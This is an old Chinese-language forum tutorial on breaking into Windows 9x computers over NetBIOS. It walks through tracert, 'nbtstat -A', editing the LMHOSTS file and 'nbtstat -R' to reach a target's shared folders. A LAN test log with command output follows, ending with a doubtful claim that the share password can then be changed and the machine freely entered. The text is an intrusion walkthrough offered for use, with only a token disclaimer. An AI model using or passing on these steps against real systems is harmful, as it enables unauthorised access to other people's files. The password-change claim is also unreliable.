WIN9X下的入侵方法

寒飞雪

下面介绍一种WIN9X下的入侵方法: 1.取得对方IP地址如XX.XX.XX.XX，方法太多不细讲了。 2.判断对方上网的地点，开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称，开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件： XX.XX.XX.XX 电脑名 5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入。 以上方法请不要乱用，本人对你用上面的方法所惹出的麻烦概不负责，请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址。

我这里是用局域网进行测试，所以没用上tracert。
本机ＩＰ：192.168.1.12
试验机： 192.168.1.5
１。用nbtstat -a 192.168.1.5时有：
C:\WINDOWS>nbtstat -a 192.168.1.5
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
LYWS8 <00> UNIQUE Registered
LEDYOUNG <00> GROUP Registered
LYWS8 <03> UNIQUE Registered
LYWS8 <20> UNIQUE Registered
LEDYOUNG <1E> GROUP Registered
CY <03> UNIQUE Registered
MAC Address = 00-80-C8-E7-67-D3
由此可知此机计算机名为LYWS8
２。将c:\windows\lmhosts.sam 改名为lmhosts.old，然后用copy命令建立lmhosts.sam：
ren lmhosts.sam lmhosts.old
copy con lmhosts.sam
lmhosts.sam内容为：
192.168.1.5 LYWS8
３。输入nbtstat -r时有：
C:\WINDOWS>nbtstat -r
NetBIOS Names Resolution and Registration Statistics
----------------------------------------------------
Resolved By Broadcast = 5
Resolved By Name Server = 0
Registered By Broadcast = 6
Registered By Name Server = 0
NetBIOS Names Resolved By Broadcast
---------------------------------------------
LEDYOUNG <1B>
LYWS8
LEDYOUNG <1B>
LYNTSRV
LEDYOUNG <1C>
４。点‘开始’－‘查找’－‘计算机’，输入　LYWS8
５。在列表中双击此计算机，弹出一设置共享时的密码输入确认框（此机本来已设置成密码访问的共享形式），可以改共享密码和共享方式
６。改了共享密码和方式后当然可以自由进出了